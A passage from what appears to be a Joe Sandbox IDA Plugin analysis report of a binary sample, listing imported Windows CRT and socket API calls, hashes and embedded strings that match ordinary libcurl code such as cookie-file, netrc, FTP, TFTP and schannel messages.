                                      • Part of subcall function 00E350DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E35175
                                      • Part of subcall function 00E350DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35181
                                    • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210FA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E2113C
                                    Strings
                                    • # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00E20FE8
                                    • %s, xrefs: 00E21083
                                    • %s.%s.tmp, xrefs: 00E20FB2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup$FileMove__acrt_iob_func_time64_unlinkcallocfclosefopenfputsqsort
                                    • String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                    • API String ID: 2634863294-1951421411
                                    • Opcode ID: 4c87ccc891fdd7cc9023f6685d79fc8b3d692b938ab679f43a81eb227d967b7c
                                    • Instruction ID: a03da1c419765835697a33d7a4dda2db85b632d6387242651839c0519d0a142c
                                    • Opcode Fuzzy Hash: 4c87ccc891fdd7cc9023f6685d79fc8b3d692b938ab679f43a81eb227d967b7c
                                    • Instruction Fuzzy Hash: 35512332A04329DFDF149F65FC55ABEBBB4EF48750F14106AE901B7291CBB09D458BA0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3B935
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3B962
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3BC25
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3BD5A
                                    Strings
                                    • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 00E3BAFB
                                    • %u.%u.%u.%u, xrefs: 00E3BB34
                                    • Bad PASV/EPSV response: %03d, xrefs: 00E3BDB8
                                    • Weirdly formatted EPSV reply, xrefs: 00E3BA0D
                                    • %c%c%c%u%c, xrefs: 00E3B98D
                                    • Couldn't interpret the 227-response, xrefs: 00E3BDA6
                                    • %u,%u,%u,%u,%u,%u, xrefs: 00E3BA7C
                                    • Illegal port number in EPSV reply, xrefs: 00E3B9C2
                                    • Connecting to %s (%s) port %d, xrefs: 00E3BD2E
                                    • Can't resolve proxy host %s:%hu, xrefs: 00E3BBCF
                                    • Can't resolve new host %s:%hu, xrefs: 00E3BCA4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr__stdio_common_vsscanf
                                    • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                    • API String ID: 2616960956-1503635593
                                    • Opcode ID: 3cdb1eae4dd346a59d87124c2d3216ddd8a71f7b9c46e10302fa8a26af8e553c
                                    • Instruction ID: 9a82cb13231fbbf28c9c5db80ac1cedd543223b79361dc853ba777154da46680
                                    • Opcode Fuzzy Hash: 3cdb1eae4dd346a59d87124c2d3216ddd8a71f7b9c46e10302fa8a26af8e553c
                                    • Instruction Fuzzy Hash: C9D1D371A08702AFDB149F24D848BAAFBD4FF84314F00692EF646B3291DB74D814CB96
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E38C37
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,00000000), ref: 00E38C5B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38D7D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38E2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38F8D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38FA8
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E38FB1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E39015
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3904B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclosefgetsfopen
                                    • String ID: $default$login$macdef$machine$password
                                    • API String ID: 1690894011-416575051
                                    • Opcode ID: 726d5e723dbe7f35698ab5c49faafd9f95aaba6c5c8749820e373cbe8b17ecd6
                                    • Instruction ID: a9231acca401f7c1949ac65440eb08560679f2e01fa6226c604b83deb221b862
                                    • Opcode Fuzzy Hash: 726d5e723dbe7f35698ab5c49faafd9f95aaba6c5c8749820e373cbe8b17ecd6
                                    • Instruction Fuzzy Hash: 22D1D731A043A88BDB358B249D583E9BFB69F55354F1450DAE489B3291CFF48EC8CB51
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31CC2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31D16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31D81
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31DAF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31DD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$P$TQ$TQ$XQ$XQ
                                    • API String ID: 622630536-1613839964
                                    • Opcode ID: 3e8a17e662472a4769f98091efabfc31101635d5d959bf8e63ae1aa77b68678b
                                    • Instruction ID: 49dd9078acfbe17bb27c27be67b2ccc66c5a2e786eeefc398f9598f91d903900
                                    • Opcode Fuzzy Hash: 3e8a17e662472a4769f98091efabfc31101635d5d959bf8e63ae1aa77b68678b
                                    • Instruction Fuzzy Hash: 29514672704601AFDB099F25EC487B57F95EF46355F18A1BEDC05AB252CB719C04CBA0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25157
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2516E
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E251A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E251C2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25219
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25237
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25255
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25273
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E252DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E252FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2531B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25339
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25356
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25370
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E253B9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2542A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25449
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25466
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E25483
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E254AD
                                      • Part of subcall function 00E1E574: getsockname.WS2_32(?,?,?), ref: 00E1E5C6
                                      • Part of subcall function 00E1E574: WSAGetLastError.WS2_32(?,?,?), ref: 00E1E5D0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$ErrorLastgetsockname
                                    • String ID:
                                    • API String ID: 3375700865-0
                                    • Opcode ID: 49ffed737606cd81539e9bbf5ec114d6216fc48e59e76181788ef13b10748e90
                                    • Instruction ID: 5ec9f8a8de19d13aca196eccf455e688b82f9bab36cd031b05605c17d2bffd9b
                                    • Opcode Fuzzy Hash: 49ffed737606cd81539e9bbf5ec114d6216fc48e59e76181788ef13b10748e90
                                    • Instruction Fuzzy Hash: E5B14B32A14615DFDF099F25F884799BBA1FF48351F14817AEC09AB266CBB42C18CF90
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E21F12
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F31
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F4E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F6B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21F88
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FA5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FCD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21FEA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22007
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22024
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22041
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22066
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2207D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22094
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E220AB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E220C5
                                      • Part of subcall function 00E21DD7: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21DFA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22102
                                      • Part of subcall function 00E26D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2212A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22147
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2215F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: aea95a0ea428f24bc1cd0f4077647e09235f7caa3b1a27ced1294ab336dc4f20
                                    • Instruction ID: 9d7b010c973cae94884a23cec79a78c40576d6f46bc3db266d66a18256916180
                                    • Opcode Fuzzy Hash: aea95a0ea428f24bc1cd0f4077647e09235f7caa3b1a27ced1294ab336dc4f20
                                    • Instruction Fuzzy Hash: 2D61AA76A14A26EFCB0D6F35FC5459DFBA5FF48251B10852BD416A3261CBB82C188F90
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E37B0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                    • API String ID: 1294909896-119092532
                                    • Opcode ID: 589b9f61699c15c6c86f39df7d45962c048cbd8e9e436ee07de07816197763d9
                                    • Instruction ID: 15bb96f579d0b1a4abef669dcb0db1e4c70032a8bc70aef7b3acdfcbac755228
                                    • Opcode Fuzzy Hash: 589b9f61699c15c6c86f39df7d45962c048cbd8e9e436ee07de07816197763d9
                                    • Instruction Fuzzy Hash: BCB104B16087059FDB38DF68DC89BE9BBE5AF45308F005598E48DB7291DA71AD48CB80
                                    APIs
                                      • Part of subcall function 00E2720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E2724B
                                      • Part of subcall function 00E2720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E27261
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E45531
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E45587
                                    Strings
                                    • ALPN: server accepted %.*s, xrefs: 00E45335
                                    • schannel: failed to retrieve remote cert context, xrefs: 00E455B3
                                    • schannel: failed to setup memory allocation, xrefs: 00E452B4
                                    • schannel: failed to setup stream orientation, xrefs: 00E452CB
                                    • schannel: failed to setup confidentiality, xrefs: 00E4529D
                                    • schannel: failed to setup replay detection, xrefs: 00E45289
                                    • schannel: failed to setup sequence detection, xrefs: 00E45275
                                    • schannel: failed to store credential handle, xrefs: 00E45490
                                    • ALPN: server did not agree on a protocol. Uses default., xrefs: 00E45377
                                    • /1.1, xrefs: 00E4535B
                                    • http, xrefs: 00E45352
                                    • schannel: failed to retrieve ALPN result, xrefs: 00E45316
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free$CertCertificateContextFreecalloc
                                    • String ID: /1.1$ALPN: server accepted %.*s$ALPN: server did not agree on a protocol. Uses default.$http$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                    • API String ID: 219865100-3105508259
                                    • Opcode ID: ec350d50adc612461dc69f892153973d6c3bec130c6a4d5cb9a0dad82178003c
                                    • Instruction ID: d215ca5742b900a53d10a2722328f8999d7277070335ab3ded20212b427344bf
                                    • Opcode Fuzzy Hash: ec350d50adc612461dc69f892153973d6c3bec130c6a4d5cb9a0dad82178003c
                                    • Instruction Fuzzy Hash: D9B12532A046149FDB24DB14EC81BEDB3F4AB49314F1411EAE449BB283DBB4AD80CF81
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F866
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0F87A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F886
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F9A0
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0F9AF
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0F9BB
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA09
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0FA18
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA24
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA39
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E0FA48
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0FA54
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: _errno$strtoul$__stdio_common_vsscanf
                                    • String ID: %c-%c%c$0kv@qv@/lv
                                    • API String ID: 3842623485-2273544561
                                    • Opcode ID: aff01bdcfb61c8d902d106b534509f7041f9df8e2be13946b41f3c198c39002e
                                    • Instruction ID: 2523a47695fcd340b0e0449f79a031c7f6bb98654cfa327bbfc3c2d496943707
                                    • Opcode Fuzzy Hash: aff01bdcfb61c8d902d106b534509f7041f9df8e2be13946b41f3c198c39002e
                                    • Instruction Fuzzy Hash: F0B1DE71A002059FCB25CF68C8906EDBBB5BF85308F2890B9D849BB695D7319D95CB60
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free$callocmallocrealloc
                                    • String ID: $ $ $ $ $ $.$.$:
                                    • API String ID: 4199894680-3908554926
                                    • Opcode ID: 664ff76814b9c64870fc6d01f99af4fa78b29289a3733b9367086f8497dd949b
                                    • Instruction ID: e020cc1a5a2c64eb7e047f9a05ac8c63dc4ec2b84065d9058a0bdf9034af2075
                                    • Opcode Fuzzy Hash: 664ff76814b9c64870fc6d01f99af4fa78b29289a3733b9367086f8497dd949b
                                    • Instruction Fuzzy Hash: A1710E31A08B129FC728DF29EA48765BBE1FF44318F28551AD415A3A91D775FC84CB81
                                    APIs
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022E2
                                    • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022E9
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E022F6
                                    • _isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022FD
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00E02312
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,00000000), ref: 00E0232A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02336
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,?), ref: 00E02354
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00000000,?,00000000), ref: 00E0236C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02377
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02387
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E0239E
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E023DC
                                    Strings
                                    • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00E022BB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ByteCharConsoleMultiWide_filenofree$BufferInfoScreenWrite_get_osfhandle_isattyfflushfwritemalloc
                                    • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                    • API String ID: 4159644049-3734715646
                                    • Opcode ID: 40066ee59959ba48cab4052b126d053f2e03b7ff544c8ab33405afb9a43e24aa
                                    • Instruction ID: 0dab76ccf8617f72c2145ea9ce5dde47ffb09684f31ad81ce584cff7b956bb28
                                    • Opcode Fuzzy Hash: 40066ee59959ba48cab4052b126d053f2e03b7ff544c8ab33405afb9a43e24aa
                                    • Instruction Fuzzy Hash: A9517971A00706AFDB149FA5DD48BEEBBF9AF08319F04541DFA05B61A1DB74AC84CB20
                                    Strings
                                    • GSSAPI handshake failure (empty security message), xrefs: 00E50193
                                    • GSSAPI handshake failure (invalid security layer), xrefs: 00E4FF18
                                    • GSSAPI handshake failure (invalid security data), xrefs: 00E4FED3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                    • API String ID: 0-3320144510
                                    • Opcode ID: a235083f05f9d789346824221b60e1fc9bfbcc97095e0c19beac3565f0d1e502
                                    • Instruction ID: d588f1690b0c3d800b47c85bfa4475e4ac5c5910051607bf38046c9413da1a62
                                    • Opcode Fuzzy Hash: a235083f05f9d789346824221b60e1fc9bfbcc97095e0c19beac3565f0d1e502
                                    • Instruction Fuzzy Hash: E2C14771A04219DFCF14DFA9EC54AADBBF5EF08351F24842AE805B7261DB74AD09CB90
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44BCA
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44BFE
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44C39
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44CD0
